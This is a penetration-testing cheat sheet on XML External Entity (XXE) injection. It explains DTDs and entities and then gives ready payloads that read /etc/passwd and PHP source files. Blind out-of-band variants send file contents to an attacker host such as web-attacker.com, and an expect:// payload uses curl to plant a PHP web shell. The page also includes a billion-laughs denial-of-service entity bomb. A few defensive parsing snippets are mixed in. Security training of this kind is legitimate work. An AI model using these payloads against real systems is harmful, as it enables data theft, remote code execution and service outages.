# XXE

XML External Entity (XXE) injection occurs when an application parses XML from user-controlled input without sanitizing it or configuring the parser securely, which lets an attacker abuse XML features (such as external entities) to perform malicious actions.

**Types**: In-Band and Blind.
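
As a rough illustration of what "securely parsing" can mean, the sketch below refuses any document that carries a DOCTYPE declaration, so no entity is ever defined. It uses Python's standard `xml.parsers.expat` module. The names `parse_rejecting_doctype` and `DoctypeForbidden` are hypothetical and chosen only for this example; a hardened parsing library may be a better fit in a real application.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when the input contains a DOCTYPE declaration."""


def parse_rejecting_doctype(data: bytes) -> str:
    """Parse XML and return its text content, refusing any DOCTYPE."""
    chunks = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # expat calls this handler as soon as it meets <!DOCTYPE ...>.
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)
```

A plain document such as `<r>ok</r>` parses normally, while any payload from this page that starts with `<!DOCTYPE` raises `DoctypeForbidden` before its entities are processed.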

## Tools

<table><thead><tr><th width="162">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/enjoiz/XXEinjector">XXEinjector</a></td><td><code>ruby XXEinjector.rb --host=&#x3C;MY_IP> --httpport=&#x3C;MY_PORT> --path=&#x3C;FILE_TO_READ> --file=&#x3C;REQ_BURP> --oob=http --phpfilter</code><br><em>Save the request from Burp Suite to a file and put <code>XXEINJECT</code> where the DTD should be injected.</em><br><em>The output is written to <code>/Logs/&#x3C;IP>/&#x3C;PATH_FILE></code>.</em></td></tr></tbody></table>

## DTD (Document Type Definition)

A DTD defines the structure against which an XML document is validated. \
It can be declared inside the document itself (right after the XML declaration on the first line) or in an external file that the document references with the `SYSTEM` keyword.

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE <name> SYSTEM "email.dtd">
```

{% endcode %}

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email SYSTEM "http://<DOMAIN>/<DTD>">
```

{% endcode %}

## Entities

Custom entities (XML variables) can be defined in an XML DTD with the `ENTITY` keyword, followed by the entity name and its value. An entity whose value is loaded from a file or URL with the `SYSTEM` keyword is an external entity. To reference a defined entity, use `&<VARIABLE_NAME>;`.

{% code overflow="wrap" %}

```
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE <name> [
  <!ENTITY varA "RANDOM">
  <!ENTITY varB SYSTEM "file:///<PATH_FILE>">
  <!ENTITY varC SYSTEM "http://<DOMAIN>/DTD">
]>
```

{% endcode %}

Reference them in the document body with `&varA;`, `&varB;`, and `&varC;`.
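
To see an internal entity being expanded, the following minimal sketch parses a small document with Python's standard `xml.etree.ElementTree`. The `email` root element is an assumption made for the example. Only the internal entity `varA` is used, so nothing is read from disk or the network.

```python
import xml.etree.ElementTree as ET

# Internal entity declared in the DOCTYPE and referenced in the body.
DOCUMENT = """<!DOCTYPE email [
  <!ENTITY varA "RANDOM">
]>
<email>&varA;</email>"""

root = ET.fromstring(DOCUMENT)
print(root.text)  # RANDOM
```

The parser substitutes the entity value before the application sees the element text, which is why a reflected field can end up showing whatever the entity resolves to.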

## Parameter Entities

XML parameter entities are a special kind of entity, declared with `%` before the name, that can only be referenced within the DTD.

{% code overflow="wrap" %}

```
<!DOCTYPE foo [ 
    <!ENTITY % xxe SYSTEM "http://web-attacker.com"> 
    %xxe; 
]>
```

{% endcode %}

Reference it inside the DTD with `%xxe;`.

## Attacks

### Read

If outdated XML libraries are used and no filtering or cleaning is applied on our XML input, we may be able to read local files.

#### Simple

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY varX SYSTEM "file:///etc/passwd">
]>
```

{% endcode %}

Define `varX`, then reference it (`&varX;`) in the field whose value is displayed in the response.

#### PHP wrapper

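Works only with PHP web applications. If the file contains special XML characters (such as `<`, `>`, `&`) or binary data, a plain file reference breaks the XML and the entity cannot be used. The `php://filter` wrapper avoids this by base64-encoding the file before it is inserted, so the output must be decoded afterwards.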

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY varX SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```

{% endcode %}
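
The value returned through the filter is base64 text, so it has to be decoded to recover the file. A minimal sketch follows. The function name `decode_filter_output` is hypothetical, and whitespace is stripped because a response may wrap long lines.

```python
import base64


def decode_filter_output(encoded: str) -> bytes:
    """Decode the base64 text returned through php://filter."""
    # Remove whitespace that the response or HTML rendering may have added.
    compact = "".join(encoded.split())
    return base64.b64decode(compact)
```

Paste the string shown in the reflected field into `decode_filter_output(...)` and write the resulting bytes to a file to inspect the source.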

#### CDATA

Another method that can extract any type of data (including binary data) from any web application back end.\
Wrap the file content in a `CDATA` section: `<![CDATA[ FILE_CONTENT ]]>` \
The XML parser treats this part as raw data.
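
The raw-data behaviour of `CDATA` can be checked locally. In this small sketch (the document content is made up for the example), characters that would normally break the XML are returned untouched by Python's standard parser.

```python
import xml.etree.ElementTree as ET

# The markup-like characters inside the CDATA section are not parsed.
DOCUMENT = '<root><![CDATA[<?php echo "a" & "b"; ?>]]></root>'

root = ET.fromstring(DOCUMENT)
print(root.text)  # <?php echo "a" & "b"; ?>
```

Without the `CDATA` wrapper the same content would raise a parse error, which is the problem the payloads in this section work around.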

<details>

<summary>NOTE</summary>

{% code overflow="wrap" %}

```xml
<!DOCTYPE <field_name_display> [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file://<FILE>">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>
```

{% endcode %}

**This will not work, since XML prevents joining internal and external entities.**

To bypass this, use XML parameter entities, a special type of entity that begins with **`%`**.\
If they are referenced from an external source (e.g., a DTD hosted on our server), all of them are considered external and can be joined.

</details>

{% tabs %}
{% tab title="1" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % pwn "<!ENTITY content '%begin;%file;%end;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
  %pwn;
]>
```

{% endcode %}

Then use `&content;`
{% endtab %}

{% tab title="2" %}

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>echo '&#x3C;!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
</strong>sudo python3 -m http.server 8000
</code></pre>

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name_display> [
  <!ENTITY % begin "<![CDATA["> 
  <!ENTITY % file SYSTEM "file:///var/www/html/index.php"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}

Then use `&joined;`
{% endtab %}
{% endtabs %}

#### Single item, no DOCTYPE

If you only control a single item of data that is placed into a server-side XML document and cannot define or modify a `DOCTYPE` element, use XInclude:

{% code overflow="wrap" %}

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

{% endcode %}
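
How an XInclude-aware processor replaces the `xi:include` element with text can be sketched with Python's standard `xml.etree.ElementInclude`. The loader `fake_loader` is a hypothetical stand-in that returns a marker string instead of reading the real file, so the example has no side effects.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

DOCUMENT = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</foo>"
)


def fake_loader(href, parse, encoding=None):
    # Stand-in loader: returns a marker instead of reading the real file.
    return f"[content of {href}, parse={parse}]"


root = ET.fromstring(DOCUMENT)
ElementInclude.include(root, loader=fake_loader)
print(root.text)  # [content of file:///etc/passwd, parse=text]
```

With `parse="text"` the included data is inserted as plain text, so the target file does not need to be well-formed XML.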

#### Image SVG

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE avatar [
  <!ENTITY varX SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<text x="10" y="50" font-family="Arial" font-size="8" fill="black">&varX;</text>
</svg>
```

{% endcode %}

### Error

This method does not require a displayed field, but it does require the web application to display runtime errors (e.g., PHP errors) because it lacks adequate exception handling for XML input. In that case, the file content can be read from the error message that the parser returns.

{% tabs %}
{% tab title="1" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}
{% endtab %}

{% tab title="2" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "file:///etc/hosts"> 
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [
  <!ENTITY % remote SYSTEM "http://<MY_IP>:8000/xxe.dtd">
  %remote;
  %error;
]>
```

{% endcode %}
{% endtab %}

{% tab title="No Own External DTD" %}
[Link](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-by-repurposing-a-local-dtd)

Suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`.

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```

{% endcode %}

To find a DTD file, use the following payload, which causes an error if the file is missing.\
Most systems contain DTD files. For example, Linux systems using the GNOME desktop environment often have a DTD file at `/usr/share/yelp/dtd/docbookx.dtd`.

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```

{% endcode %}

Since many common systems that include DTD files are open source, you can usually obtain a copy of the files with a quick internet search and find an entity that you can redefine.
{% endtab %}
{% endtabs %}

### Blind

This method exfiltrates data when there are no output fields and no errors are printed.\
Try it first with `/etc/hostname`, a single-line file, since some XML parsers reject request URLs that contain newline characters.

{% tabs %}
{% tab title="1" %}

<pre data-title="xxe.dtd" data-overflow="wrap"><code>&#x3C;!ENTITY % file SYSTEM "file:///etc/passwd">
<strong>&#x3C;!ENTITY % eval "&#x3C;!ENTITY &#x26;#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
</strong>%eval;
%exfiltrate;
</code></pre>

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://<MY_IP>:8000/xxe.dtd"> 
  %xxe;
]>
```

{% endcode %}
{% endtab %}

{% tab title="2" %}
{% code title="xxe.dtd" overflow="wrap" %}

```
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> 
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<MY_IP>:8000/?content=%file;'>">
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo python3 -m http.server 8000
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [ 
  <!ENTITY % remote SYSTEM "http://<MY_IP>:8000/xxe.dtd">
  %remote;
  %oob;
]>
```

{% endcode %}
{% endtab %}
{% endtabs %}
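
With the base64 variant, the file arrives as a query parameter in the listener's access log. The sketch below pulls it out of one log line and decodes it. It assumes the log format printed by `python3 -m http.server` and the parameter name `content` used in the second tab; the function name `decode_exfil` is hypothetical.

```python
import base64
import re
from urllib.parse import unquote, urlsplit


def decode_exfil(log_line: str, param: str = "content") -> bytes:
    """Extract a base64 query parameter from a log line and decode it."""
    match = re.search(r'"GET (\S+) HTTP', log_line)
    if match is None:
        raise ValueError("no GET request found in log line")
    query = urlsplit(match.group(1)).query
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == param:
            # unquote() keeps '+' intact, which is a valid base64 character.
            value = unquote(value)
            # Restore padding in case it was dropped in transit.
            value += "=" * (-len(value) % 4)
            return base64.b64decode(value)
    raise ValueError(f"parameter {param!r} not found")
```

Passing a line copied from the listener output returns the file bytes, which can then be printed or saved.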

### RCE

XXE can also lead to remote code execution.\
This requires the PHP **expect** module to be installed and enabled. \
Commands can then be executed with their output shown in the displayed field, or a web shell can be downloaded to the server. Beware of characters that are not allowed: the payload below replaces spaces with `$IFS`.

{% code overflow="wrap" %}

```bash
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php 
sudo python3 -m http.server 80
```

{% endcode %}

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [
  <!ENTITY varX SYSTEM "expect://curl$IFS-O$IFS'<MY_IP>/shell.php'">
]>
```

{% endcode %}

### DoS

Denial of Service (DoS) attacks are also possible.

{% code overflow="wrap" %}

```
<!DOCTYPE <field_name> [
  <!ENTITY a0 "DOS" >
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
  <!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
  <!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
  <!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
  <!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
  <!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
  <!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
```

{% endcode %}

This payload defines entity `a0` as `DOS`, references it ten times in `a1`, references `a1` ten times in `a2`, and so on. Referencing `&a10;` in the document body expands to 10^10 copies of `a0`, so the nested expansion grows exponentially until the back-end server runs out of memory.
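
The growth can be quantified with a short calculation. This sketch only does the arithmetic for the payload above (a 3-character base entity, 10 references per level, 10 levels) and does not parse anything; `expanded_size` is a hypothetical helper name.

```python
def expanded_size(base: str, fanout: int, levels: int) -> int:
    """Return the length of the fully expanded top-level entity."""
    # Each level repeats the previous entity `fanout` times.
    return len(base) * fanout ** levels


size = expanded_size("DOS", fanout=10, levels=10)
print(f"{size:,} characters")  # 30,000,000,000 characters
```

A payload of a few hundred bytes therefore asks the parser to materialize roughly 30 GB of text.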

